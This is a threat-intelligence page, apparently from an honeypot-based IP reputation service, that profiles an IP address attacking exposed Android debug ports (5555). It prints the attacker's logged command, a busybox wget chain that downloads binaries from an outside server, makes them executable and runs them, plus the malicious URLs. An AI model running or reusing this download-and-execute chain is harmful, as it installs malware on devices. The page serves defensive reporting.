Aktive Bedrohung • NIEDRIG
176.65.148.55
Herkunftsland🇳🇱 Paises Bajos
Erste Erkennung25.2.2026
Letzte Aktivitat25.2.2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
3
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
0
Malware
Geolokalisierung
- Land
- 🇳🇱 Paises Bajos
- Stadt
- Eygelshoven
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Angriffsarten
adbhoney
Angegriffene Ports
5555
Zugehorige Malware
Keine zugehorige Malware
Ausgefuhrte Befehle
$
cd /data/local/tmp/; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/55vrn6yo1m?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 55vrn6yo1m; ./55vrn6yo1m; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/gp3agts8a5?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 gp3agts8a5; ./gp3agts8a5; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/0tupj6m8h3?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 0tupj6m8h3; ./0tupj6m8h31xURLhaus Intel2 URLsabuse.ch
Diese IP hat folgende bekannte bosartige URLs verwendet:
http://130.12.180.124/fit075kmyvo3/assets/js/gp3agts8a5?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7wofflinemalware_downloadelfua-wget
http://130.12.180.124/fit075kmyvo3/assets/js/0tupj6m8h3?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7wofflinemalware_downloadelfua-wget
Risikobewertung
10
/100
NiedrigMittelHochKritisch